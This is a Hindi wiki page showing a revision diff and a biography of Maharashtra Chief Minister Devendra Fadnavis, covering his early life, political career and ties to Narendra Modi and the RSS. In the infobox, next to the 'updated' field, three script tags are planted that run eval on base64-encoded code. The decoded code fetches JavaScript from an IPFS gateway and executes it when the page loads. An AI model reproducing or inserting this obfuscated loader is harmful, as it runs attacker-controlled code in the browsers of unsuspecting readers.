"देवेन्द्र फडणवीस" के अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
छो (Text replace - " करीब" to " क़रीब")
छो (Text replace - "अविभावक" to "अभिभावक")
पंक्ति 9: पंक्ति 9:
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
 
|मृत्यु कारण=
 
|मृत्यु कारण=
|अविभावक=श्री गंगाधर राव फडणवीस और श्रीमती सरिता फडणनवीस
+
|अभिभावक=श्री गंगाधर राव फडणवीस और श्रीमती सरिता फडणनवीस
 
|पति/पत्नी=श्रीमती अमृता फडणवीस  
 
|पति/पत्नी=श्रीमती अमृता फडणवीस  
 
|संतान=कु. दिविजा (पुत्री)
 
|संतान=कु. दिविजा (पुत्री)

04:59, 29 मई 2015 का अवतरण

देवेन्द्र फडणवीस
देवेन्द्र फडणवीस
पूरा नाम देवेन्द्र फडणवीस
जन्म 22 जुलाई, 1970
जन्म भूमि नागपुर, महाराष्ट्र
अभिभावक श्री गंगाधर राव फडणवीस और श्रीमती सरिता फडणनवीस
पति/पत्नी श्रीमती अमृता फडणवीस
संतान कु. दिविजा (पुत्री)
नागरिकता भारतीय
पार्टी भारतीय जनता पार्टी
पद महाराष्ट्र के 18वें मुख्यमंत्री
कार्य काल 31 अक्टूबर, 2014 से अब तक
शिक्षा विधि स्नातक
विद्यालय लॉ कॉलेज नागपुर, धरमपेठ जूनियर कॉलेज
अन्य जानकारी देवेन्द्र फडणवीस महज 27 साल की आयु में नागपुर के मेयर बन चुके हैं।
बाहरी कड़ियाँ आधिकारिक वेबसाइट (देवेन्द्र फडणवीस), आधिकारिक वेबसाइट (महाराष्ट्र)
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

देवेन्द्र फडणवीस (अंग्रेज़ी: Devendra Fadnavis, जन्म:22 जुलाई, 1970) भारतीय जनता पार्टी के प्रसिद्ध नेता एवं महाराष्ट्र के वर्तमान मुख्यमंत्री हैं। देवेन्द्र फडणवीस महाराष्ट्र विधानसभा में नागपुर दक्षिण पश्चिम से विधायक हैं। पूर्व में वे नागपुर नगर निगम के मेयर भी रह चुके हैं। देवेन्द्र फडणवीस ने 31 अक्टूबर, 2014 को महाराष्ट्र के 18वें मुख्यमंत्री के रूप में शपथ ली।

जीवन परिचय

देवेंद्र फडणवीस का जन्म 22 जुलाई 1970 को नागपुर में हुआ। की छवि जमीन से जुड़े तेज तर्रार नेता की है। देवेंद्र फडणवीस को राजनीति विरासत में मिली। इनके पिता गंगाधर राव फडणवीस नागपुर से एमएलसी थे। फडणवीस ने वार्ड स्तर से अपनी राजनीति शुरू की। फडणवीस ने बीजेपी में वार्ड संयोजक से लेकर प्रदेश अध्यक्ष तक बनने का सफर तय किया है। फडणवीस जब महज 27 साल के थे तभी वो नागपुर के मेयर बन चुके थे। फडणवीस अब तक विधानसभा के लिए चार बार चुने जा चुके हैं। फडणवीस की पहचान एक पढ़े लिखे नेता की है। उन्होंने कानून और बिजनेस मैनेजमैंट की पढ़ाई की है। फडणवीस बजट पर एक किताब भी लिख चुके हैं।

नरेंद्र के देवेंद्र

देवेंद्र फडणवीस को प्रधानमंत्री नरेंद्र मोदी का क़रीबी माना जाता है। चुनाव प्रचार के दौरान नागपुर की सभा में मोदी ने फडणवीस की खुल कर तारीफ की थी। चुनावों से पहले ही 'दिल्ली में नरेंद्र और महाराष्ट्र में देवेंद्र' के नारे लगने शुरू हो चुके थे। लोकसभा चुनावों से पहले देवेंद्र फडणवीस ने महाराष्ट्र में बीजेपी और ख़ासकर मोदी को आगे बढ़ाने में पूरा जोर लगा दिया था। नरेंद्र मोदी ने फडणवीस को सक्रिय जनसेवक बताया था। फडणवीस की तारीफ उनके विरोधी भी करते हैं। चुनाव से ठीक एक दिन पहले महाराष्ट्र के पूर्व मुख्मयंत्री और कांग्रेस नेता पृथ्वीराज चव्हाण ने फडणवीस को मुख्यमंत्री पद का सबसे योग्य चेहरा बताया था। देवेंद्र फडणवीस को सिर्फ नरेंद्र मोदी का ही नहीं बल्कि राष्ट्रीय स्वयंसेवक संघ का समर्थन भी मिला है। फडणवीस उसी नागपुर से आते हैं जहां आर.एस.एस का मुख्यालय है। पिता गंगाधरराव जनसंघ में थे तो बचपन से ही आरएसएस से जुड़ गए थे देवेंद्र। आरएसएस के कार्यक्रमों में मंच पर मौजूदगी बताती है कि आरएसएस से उनका नाता कितना गहरा है। महाराष्ट्र के प्रदेशाध्यक्ष बनने से लेकर मुख्यमंत्री बनने में भी आरएसएस का आशीर्वाद हमेशा रहा है। [1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. देवेंद्र फडणवीस को जीताने वाली पांच बातें (हिंदी) एबीपी न्यूज। अभिगमन तिथि: 31 अक्टूबर, 2014।

बाहरी कड़ियाँ

संबंधित लेख